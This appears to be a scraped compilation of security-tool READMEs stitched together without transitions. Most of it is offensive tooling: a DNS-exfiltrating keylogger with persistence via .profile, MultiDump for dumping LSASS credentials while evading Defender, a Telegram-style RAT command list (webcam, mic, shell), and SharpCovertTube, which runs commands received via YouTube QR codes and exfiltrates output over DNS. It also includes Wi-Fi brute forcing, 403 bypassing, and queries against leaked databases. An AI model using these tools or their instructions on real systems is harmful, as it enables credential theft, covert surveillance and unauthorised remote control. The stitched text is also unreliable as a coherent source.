What is Planespotting & Aircraft OSINT?
Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, information gathering and OSINT are a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject: in this case, planes!
skytrack features three main functions for aircraft information
gathering and display options. They include the following:
Aircraft Reconnaissance & OSINT
skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.
PDF Aircraft Information Report
skytrack also enables you to save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The report will be titled "skytrack_report.pdf".
Tail Number to ICAO Converter
There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (also known as the N-Number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO designation is a six-character fixed-length hexadecimal ID. Both standards are highly pertinent for aircraft reconnaissance, as either can be used to search for a specific aircraft in data sources. However, converting between the two formats can be rather cumbersome, as the mapping follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.
Further Explanation
ICAO and Tail Numbers follow a mapping system like the following:
```
ICAO address    N-Number (Tail Number)
a00001          N1
a00002          N1A
a00003          N1AA
```
You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)
:warning: Converter only works for USA-registered aircraft
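The sequential mapping above can be sketched in Python. The sample pairs come straight from the table; the start-of-block constant and everything else here are illustrative assumptions, since the full FAA mapping algorithm is considerably more involved:

```python
# Minimal sketch of the sequential ICAO <-> N-Number relationship shown
# above. SAMPLE_MAP holds only the table's example pairs; a complete
# converter would implement the full FAA mapping scheme.
US_ICAO_START = 0xA00001  # assumption: first US-assigned address (maps to N1)

SAMPLE_MAP = {
    0xA00001: "N1",
    0xA00002: "N1A",
    0xA00003: "N1AA",
}

def icao_to_tail(icao_hex: str) -> str:
    """Look up the tail number for an ICAO address (sample data only)."""
    return SAMPLE_MAP.get(int(icao_hex, 16), "<unknown>")
```

For example, `icao_to_tail("a00002")` returns `"N1A"`, matching the second row of the table.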
These tools excel at lightweight exfiltration and persistence, properties which help prevent detection. They use DNS tunneling/exfiltration to bypass firewalls and avoid detection.
Server
Setup
The server uses python3.
To install dependencies, run python3 -m pip install -r requirements.txt
Starting the Server
To start the server, run python3 main.py
```
usage: dns exfiltration server [-h] [-p PORT] ip domain

positional arguments:
  ip
  domain

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  port to listen on
```
By default, the server listens on UDP port 53. Use the -p flag to specify a different port.
ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.
domain is the domain to listen for, which should be the domain that the server is authoritative for.
Registrar
On the registrar, you want to change your domain's nameservers to custom DNS.
Point them to two hostnames, ns1.example.com and ns2.example.com.
Add records that point those nameserver hostnames to your exfiltration server's IP address.
This is the same as setting glue records.
Client
Linux
The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.
logger.sh
```
# Usage: logger.sh [-options] domain
# Positional Arguments:
#   domain: the domain to send data to
# Options:
#   -p path: give path to log file to listen to
#   -l: run the logger with warnings and errors printed
```
To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.
The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.
The -l option will show warnings and errors, which can be useful for debugging.
logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile to start on every new interactive shell.
connection.sh
```
Usage: command [-options] domain
Positional Arguments:
  domain: the domain to send data to
Options:
  -n: number of characters to store before sending a packet
```
Windows
Build
To build the keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output a file named logger.exe in the build directory.
make production domain=example.com
You can also choose to build the program with debugging by making the debug target.
make debug domain=example.com
For both targets, you will need to specify the domain the server is listening for.
Sending Test Requests
You can use dig to send requests to the server:
dig @127.0.0.1 a.1.1.1.example.com A +short sends a connection request to a server on localhost.
dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short sends a test message to localhost.
Replace example.com with the domain the server is listening for.
Protocol
Starting a Connection
A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.
The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].
The server will respond with an IP address in following format: 123.123.123.[id]
Concurrent connections cannot exceed 254, and clients are never considered "disconnected."
Exfiltrating Data
A record requests starting with b indicate exfiltrated data being sent to the server.
The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].
The server will respond with [code].123.123.123
id is the id that was established on connection. Data is sent as ASCII encoded in hex.
code is one of the codes described below.
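The two record formats above can be sketched as small helper functions. The a./b. prefixes, the hex-encoded ASCII payload, and the 123.123.123.[id] response layout follow the protocol description; the domain is the illustrative example.com used earlier:

```python
def connect_query(domain: str = "example.com") -> str:
    """Build the A-record name that starts a connection: a.1.1.1.[sld].[tld]."""
    return f"a.1.1.1.{domain}"

def data_query(packet_num: int, client_id: int, data: str,
               domain: str = "example.com") -> str:
    """Build a data name: b.[packet #].[id].[data].[sld].[tld],
    with the payload ASCII-encoded as hex."""
    hex_data = data.encode("ascii").hex().upper()
    return f"b.{packet_num}.{client_id}.{hex_data}.{domain}"

def client_id_from_answer(ip: str) -> int:
    """The server answers a connection request with 123.123.123.[id];
    the id is the last octet."""
    return int(ip.rsplit(".", 1)[1])
```

For example, `data_query(1, 1, "The quick brown fox.")` produces a name of the same shape as the b. record in the dig test above.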
Response Codes
200: OK
If the client sends a request that is processed normally, the server will respond with code 200.
201: Malformed Record Requests
If the client sends a malformed record request, the server will respond with code 201.
202: Non-Existent Connections
If the client sends a data packet with an id greater than the number of connections, the server will respond with code 202.
203: Out of Order Packets
If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.
204: Max Connections Reached
If the client attempts to create a connection when the maximum has been reached, the server will respond with code 204.
Dropped Packets
Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
Side Notes
Linux
Log File
The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, select the appropriate option to print ASCII control characters (such as -v for cat), or open it in a text editor.
Non-Interactive Shells
The keylogger relies on script, so the keylogger won't run in non-interactive shells.
Windows
Repeated Requests
For some reason, the Windows DnsQuery_A function always sends duplicate requests. The server handles this correctly because it discards repeated packets.
MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
Blog post: https://xre0us.io/posts/multidump
MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
```
-p          Path to save procdump.exe; use full path. Defaults to the temp directory
-l          Path to save the encrypted dump file; use full path. Defaults to the current directory
-r          Set ip:port to connect to a remote handler
--procdump  Writes procdump to disk and uses it to dump LSASS
--nodump    Disable LSASS dumping
--reg       Dump the SAM, SECURITY and SYSTEM hives
--delay     Increase the interval between connections for slower network speeds
-v          Enable verbose mode
```
MultiDump defaults to local mode using comsvcs.dll and saves the encrypted dump in the current directory.

Examples:

```
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
```
```
options:
  -h, --help            show this help message and exit
  -r REMOTE, --remote REMOTE
                        Port to receive remote dump file
  -l LOCAL, --local LOCAL
                        Local dump file, key needed to decrypt
  --sam SAM             Local SAM save, key needed to decrypt
  --security SECURITY   Local SECURITY save, key needed to decrypt
  --system SYSTEM       Local SYSTEM save, key needed to decrypt
  -k KEY, --key KEY     Key to decrypt local file
  --override-ip OVERRIDE_IP
                        Manually specify the IP address for key generation in remote mode, for proxied connections
```
As with all LSASS-related tools, Administrator privileges / SeDebugPrivilege are required.
The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your environment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.
By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.
MultiDump.exe ... [i] Local Mode Selected. Writing Encrypted Dump File to Disk... [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk. [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump is used, ProcDump.exe will be written to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
./ProcDumpHandler.py -r 9001 [i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.
An additional option to dump the SAM, SECURITY and SYSTEM hives is available with --reg; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation information gathering easier.
Building MultiDump
Open in Visual Studio, build in Release mode.
Customising MultiDump
It is recommended to customise the binary before compiling, for example by changing the static strings or the RC4 key used to encrypt them. To do so, another Visual Studio project, EncryptionHelper, is included. Simply change the key or strings, and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.
Self deletion can be toggled by uncommenting the following line in Common.h:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of). The investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
TL;DR
Installation
Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
Download the GAP.py and requirements.txt from this project and place in the same directory.
Go to the Extensions -> Installed and click Add under Burp Extensions.
Select Extension type of Python and select the GAP.py file.
Using
Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:
Or you can right click a request or response in any other context and select GAP from the Extensions menu.
Then go to the GAP tab to see the results:
IMPORTANT Notes
If you don't need one of the modes, then un-check it as results will be quicker.
If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run it for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.
If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.
It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.
The Words mode uses the beautifulsoup4 library, and this can be quite slow, so be patient!
In Depth Instructions
Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.
NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.
TODO
Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
Add an option to not add the Tentative Issues, e.g. parameters that were found in the Response (but not as query parameters in links found).
Improve performance of the link finding regular expressions.
Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
Deal with other size displays and font sizes better to make sure all controls are viewable.
If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
Use an alternative to beautifulsoup4 that is faster to parse responses for Words.
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β (I could use the caffeine!)
99.99% are secured by a secondary Windows login screen.
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
C2 Infrastructure
CobaltStrike Servers
```
product:"cobalt strike team server"
product:"Cobalt Strike Beacon"
ssl.cert.serial:146473198 - default certificate serial number
ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
ssl:foren.zik
```
During the reconnaissance phase or when doing OSINT, we often use Google dorking and Shodan, and thus the idea of Dorkish. Dorkish is a Chrome extension that facilitates custom dork creation for Google and Shodan using the builder, and it offers prebuilt dorks for efficient reconnaissance and OSINT engagements.
2- Go to chrome://extensions/ and enable Developer mode in the top right corner. 3- Click the Load unpacked extension button and select the dorkish folder.
Note: For Firefox users, you can find the extension here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/
Features
Google dorking
Builder with keywords to filter your google search results.
Prebuilt dorks for Bug bounty programs.
Prebuilt dorks used during the reconnaissance phase in bug bounty.
Prebuilt dorks for exposed files and directories
Prebuilt dorks for logins and sign up portals
Prebuilt dorks for cyber security jobs
Shodan dorking
Builder with filter keywords used in Shodan.
Variety of prebuilt dorks to find IoT, network infrastructure, cameras, ICS, databases, etc.
Usage
Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.
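At its core, a dork builder like the one described reduces to composing operator:value pairs into a query string. The sketch below is an illustration, not Dorkish's actual code; the operators shown are standard Google/Shodan filter keywords:

```python
def build_dork(**filters: str) -> str:
    """Join operator:value pairs into a single dork query string."""
    return " ".join(f"{op}:{value}" for op, value in filters.items())

# Google example: find login pages on a target domain
google_dork = build_dork(site="example.com", inurl="login")

# Shodan example: RDP exposed by a given organisation
shodan_dork = build_dork(port="3389", org='"Example Org"')
```

The resulting string is what gets handed to the chosen search engine when you click search.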
TODO
Add more useful dorks and categories
Fix some bugs
Add a search bar to search through the results
Might add some LLM models to build dorks
Notes
I have built some dorks and used some public resources to gather others. Here are a few:
- https://github.com/lothos612/shodan
- https://github.com/TakSec/google-dorks-bug-bounty
Warning
I am not responsible for any damage caused by using the tool
```
/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager (/fm /home or /fm C:\)
/mic 10 - record audio from mic
/clip - get clipboard data
```

Press the button to download a file. Send any file as a file for upload to the target.
DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.
Prerequisites
Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.
Environment Setup
Clone the Repository
First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:
```
git clone https://github.com/luijait/DarkGPT.git
cd DarkGPT
```
Configure Environment Variables
You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:
DEHASHED_API_KEY="your_dehashed_api_key_here"
Install Dependencies
This project requires certain Python packages to run. Install them by running the following command:
pip install -r requirements.txt

Then run the project:

python3 main.py
GTFOcli is a command-line interface for easily searching binaries and commands that can be used to bypass local security restrictions in misconfigured systems.
Installation
Using go:
go install github.com/cmd-tools/gtfocli@latest
Using homebrew:
```
brew tap cmd-tools/homebrew-tap
brew install gtfocli
```
This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. It then uses the macchanger command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.
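The vendor-prefix-plus-random-suffix idea can be sketched in Python (the actual tool shells out to macchanger; the OUI list below is a stand-in for macchanger's vendor list and is purely illustrative):

```python
import random

# Stand-in for the vendor prefixes macchanger would list;
# these values are assumptions chosen only for illustration.
VENDOR_OUIS = ["00:0c:29", "00:1b:44", "00:50:56"]

def random_mac() -> str:
    """Pick a random vendor prefix and append a random 3-byte suffix."""
    prefix = random.choice(VENDOR_OUIS)
    suffix = ":".join(f"{random.randrange(256):02x}" for _ in range(3))
    return f"{prefix}:{suffix}"
```

The resulting address would then be applied at startup with something like `macchanger -m <address> <interface>` from the crontab entry.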
Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.
a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value, ensuring the decoded output remains unintelligible while imposing minimal performance overhead.
What is a JWT Token?
A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.
What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the ciphertext (payload), and the authentication tag. Probably the most common use case for JWTs is to utilize them as access tokens and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.
Primary Objective of this Code Snippet
This code snippet offers a tweak aiming to enhance the security of the payload section of JWT tokens, where the stored keys are visible in plaintext once decoded. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.
userid
The code snippet targets the key named "userid" stored in the payload section as an example.
The choice of "userid" stems from its frequent use for user identification or authentication purposes after validating the token's validity (e.g., ensuring it has not expired).
The idea behind attempting to obscure the value of the key named "userid" is as follows:
Encryption:
The timestamp is hashed and then encrypted by performing bitwise XOR operation with the user ID.
XOR operation is performed using a symmetric key.
The resulting value is then encoded using Base64.
Decryption:
Encrypted data is decoded using Base64.
Decryption is performed by XOR operation with the symmetric key.
The original user ID and hashed timestamp are revealed in plaintext.
The user ID part is extracted by splitting at the "|" delimiter for relevant use and purposes.
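A minimal sketch of the steps above, assuming SHA-256 for the timestamp hash and a repeating-key XOR (both are assumptions; the original snippet's exact choices may differ):

```python
import base64
import hashlib
import time

def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def obfuscate_userid(userid: str, key: bytes) -> str:
    # assumption: SHA-256 as the timestamp hash
    hashed_ts = hashlib.sha256(str(int(time.time())).encode()).hexdigest()
    plaintext = f"{userid}|{hashed_ts}".encode()  # "|" delimiter per the scheme
    return base64.b64encode(xor_with_key(plaintext, key)).decode()

def recover_userid(value: str, key: bytes) -> str:
    plaintext = xor_with_key(base64.b64decode(value), key).decode()
    return plaintext.split("|", 1)[0]  # split at "|" to extract the user ID
```

Because the hashed timestamp differs on every issuance, the encoded value keeps changing even for the same user ID, which is the "constantly altering its value" property described above.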
Symmetric Key for XOR Encoding:
Various materials can be utilized for this key.
It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.
However, this key should be securely stored in the database management system (DBMS).
One more note: in the example, the key is shown as { 'userid': 'random_value' }, making it apparent that it represents a user ID. However, this is merely for illustrative purposes. In practice, a predetermined and undisclosed name is typically used, for example 'a': 'changing_random_value'.
Notes
This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure.
It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.
Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.
And...
If you find this helpful, please press the "star" :star2: to support further improvements.
preview
# python3 main.py
- Current Unix Timestamp: 1709160368 - Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08
This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.
Wordlist Files
ssh-priv-key-loot-common.txt: Default and common naming conventions for SSH private key files.
ssh-priv-key-loot-medium.txt: Probable file names without backup file extensions.
ssh-priv-key-loot-extended.txt: Probable file names with backup file extensions.
ssh-priv-key-loot-*_w_gui.txt: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.
Usage
These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other bruteforcing tool that supports custom wordlists. They can help expand the scope of your brute-forcing or enumeration efforts when targeting SSH private key files.
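As an illustration of the "custom python scripts" use case, here is a sketch that tries each candidate filename against a base URL. The fetch callback is injected so the HTTP mechanics stay out of the way; all names and the URL are assumptions for illustration:

```python
from typing import Callable, Iterable, List

def probe_key_names(base_url: str, names: Iterable[str],
                    fetch: Callable[[str], bool]) -> List[str]:
    """Return the URLs for which fetch() reports a hit (e.g. HTTP 200).
    names would typically be read from one of the wordlist files above."""
    hits = []
    for name in names:
        url = f"{base_url.rstrip('/')}/{name.strip()}"
        if fetch(url):
            hits.append(url)
    return hits
```

In a real run you would wire `fetch` to something like `requests.get(url).status_code == 200`, or use Burp Intruder/Hydra as noted.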
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.
Prerequisites
Before you install and run nomore403, make sure you have the following: - Go 1.15 or higher installed on your machine.
Installation
From Releases
Grab the latest release for your OS from our Releases page.
Compile from Source
If you prefer to compile the tool yourself:
```
git clone https://github.com/devploit/nomore403
cd nomore403
go get
go build
```
Customization
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
```
./nomore403 -h
Command line application that automates different ways to bypass 40X codes.

Usage:
  nomore403 [flags]

Flags:
  -i, --bypass-ip string      Use a specified IP address or hostname for bypassing access controls. Injects this IP in headers like 'X-Forwarded-For'.
  -d, --delay int             Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).
  -f, --folder string         Specify the folder location for payloads if not in the same directory as the executable.
  -H, --header strings        Add one or more custom headers to requests. Repeatable flag for multiple headers.
  -h, --help                  help for nomore403
      --http                  Use HTTP instead of HTTPS for requests defined in the request file.
  -t, --http-method string    Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.
  -m, --max-goroutines int    Limit the maximum number of concurrent goroutines to manage load (default 50).
      --no-banner             Disable the display of the startup banner (default: banner shown).
  -x, --proxy string          Specify a proxy server for requests, e.g., 'http://server:port'.
      --random-agent          Enable the use of a randomly selected User-Agent.
  -l, --rate-limit            Halt requests upon encountering a 429 (rate limit) HTTP status code.
  -r, --redirect              Automatically follow redirects in responses.
      --request-file string   Load request configuration and flags from a specified file.
  -u, --uri string            Specify the target URL for the request.
  -a, --user-agent string     Specify a custom User-Agent string for requests (default: 'nomore403').
  -v, --verbose               Enable verbose output for detailed request/response logging.
```
Contributing
We welcome contributions of all forms. Here's how you can help:
Report bugs and suggest features.
Submit pull requests with bug fixes and new features.
Security Considerations
While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.
License
nomore403 is released under the MIT License. See the LICENSE file for details.
WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script, which uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack, but it needs no external libraries, just Python and Python scripts.
Installation
The packages are minimal, or nearly none. The package install command is:
pip install rich pyfiglet
That's it.
Features
So listing the features:
Overall Features:
We can use custom interfaces or non-default interfaces to run the attack.
Well-defined way of using netsh and listing and utilizing targets.
Upgradeability
Code-Wise Features:
Interactive menu-driven system with rich.
Versatility in using interfaces, targets, and password files.
The user is required to provide the network interface for the tool to use.
By default, the interface is set to Wi-Fi.
Search and Set Target:
The user must search for and select the target network.
During this process, the tool performs the following sub-steps:
Disconnects all active network connections for the selected interface.
Searches for all available networks within range.
Input Password File:
The user inputs the path to the password file.
The default path for the password file is ./wordlist/default.txt.
Run the Attack:
With the target set and the password file ready, the tool is now prepared to initiate the attack.
Attack Procedure:
The attack involves iterating through each password in the provided file.
For each password, the following steps are taken:
A custom XML configuration for the connection attempt is generated and stored.
The tool attempts to connect to the target network using the generated XML and the current password.
To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
This loop continues until a successful ping response is received, indicating a successful connection attempt.
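The attack loop described above can be summarised as follows; here connect and ping_ok stand in for the XML-profile/netsh connection step and the 1-packet ping check (the function names are illustrative, not WinFiHack's actual code):

```python
from typing import Callable, Iterable, Optional

def bruteforce(ssid: str, passwords: Iterable[str],
               connect: Callable[[str, str], None],
               ping_ok: Callable[[], bool]) -> Optional[str]:
    """Try each password in turn; a successful ping means the
    connection attempt worked and the password is correct."""
    for password in passwords:
        connect(ssid, password)   # generate XML profile + netsh connect
        if ping_ok():             # 1-packet ping to verify connectivity
            return password       # ping answered: this password worked
    return None                   # wordlist exhausted without success
```

The early return on the first successful ping mirrors the loop ending once a successful ping response is received.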
How to run this
After installing all the packages, just run python main.py and the rest is history. Make sure you run this on Windows, because it won't work on any other OS. The interface looks like this:
Contributions
For contributions:
- First Clone: First clone the repo into your dev environment and make your edits.
- Comments: I would appreciate it if you could add comments explaining your POV and also explaining the upgrade.
- Submit: Submit a PR for me to verify the changes and approve it if necessary.
SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.
The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.
It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.
It will check the Youtube channel at a fixed interval (every 10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder example-videos:
After finding there is a new video in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:
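The base64-over-DNS exfiltration step can be sketched as follows. This is a hedged illustration, not SharpCovertTube's actual code (which is C#): the function name and the c2.example.com domain are assumptions, but the idea of base64-encoding the command response and splitting it across several DNS queries matches the behavior described here.

```python
import base64

def encode_for_dns(output: str, domain: str = "c2.example.com",
                   label_len: int = 63) -> list[str]:
    """Encode a command response and split it into DNS-safe subdomain
    labels (max 63 chars each), producing one query name per chunk."""
    # URL-safe base64 avoids '+' and '/', which are not hostname-safe;
    # '=' padding is stripped for the same reason.
    b64 = base64.urlsafe_b64encode(output.encode()).decode().rstrip("=")
    chunks = [b64[i:i + label_len] for i in range(0, len(b64), label_len)]
    # Prefix each query with a sequence number so order can be restored
    return [f"{n}.{chunk}.{domain}" for n, chunk in enumerate(chunks)]
```

A listener that records incoming queries (for example, Burp's collaborator, as mentioned below) can then reassemble the chunks by sequence number and decode the response.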
This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from example-videos is uploaded and the content of c:\temp is exfiltrated using several DNS queries:
Logging to a file is optional, but you must check that the folder for that file exists on the system; the default value is "c:\temp\.sharpcoverttube.log". DNS exfiltration is also optional and can be tested using Burp's collaborator:
As an alternative, I created this repository with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.
Configuration
There are some values you can change, you can find them in Configuration.cs file for the regular binary and the service binary. Only the first two have to be updated:
channel_id (Mandatory!!!): Get your Youtube channel ID from here.
api_key (Mandatory!!!): To get the API key create an application and generate the key from here.
payload_aes_key (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-character string.
payload_aes_iv (Optional. Default: "0000000000000000"): AES IV for decrypting QR codes (if using AES). It must be a 16-character string.
seconds_delay (Optional. Default: 600): Seconds of delay between checks for a newly uploaded video. If the value is too low you will exceed the API rate limit.
debug_console (Optional. Default: true): Show debug messages in console or not.
log_to_file (Optional. Default: true): Write debug messages in log file or not.
TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.
FILE (-f) is the path where the video is generated.
COMMAND (-c) is the command to execute in the system.
AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.
AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.
Examples
Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:
python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami
Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:
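The command for this second example is not shown here; assembled from the flags documented above (with the default key and IV), it would presumably look like:

```shell
python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000
```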
You can find the code to run it as a service in the SharpCovertTube_Service folder. It has the same functionalities except self-deletion, which would not make sense in this case.
It is possible to install it with InstallUtil; it is prepared to run as the SYSTEM user, and you need to install it as administrator:
InstallUtil.exe SharpCovertTube_Service.exe
You can then start it with:
net start "SharpCovertTube Service"
If you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you cannot install services, so you can only use the ordinary binary.
Notes
The file must be compiled for 64 bits! This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's QR-Capture project, who borrowed part of it from Uzi Granot's QRCode project, who in turn borrowed part of it from Zakhar Semenov's Camera_Net project (then I lost track). So thanks to all of them!
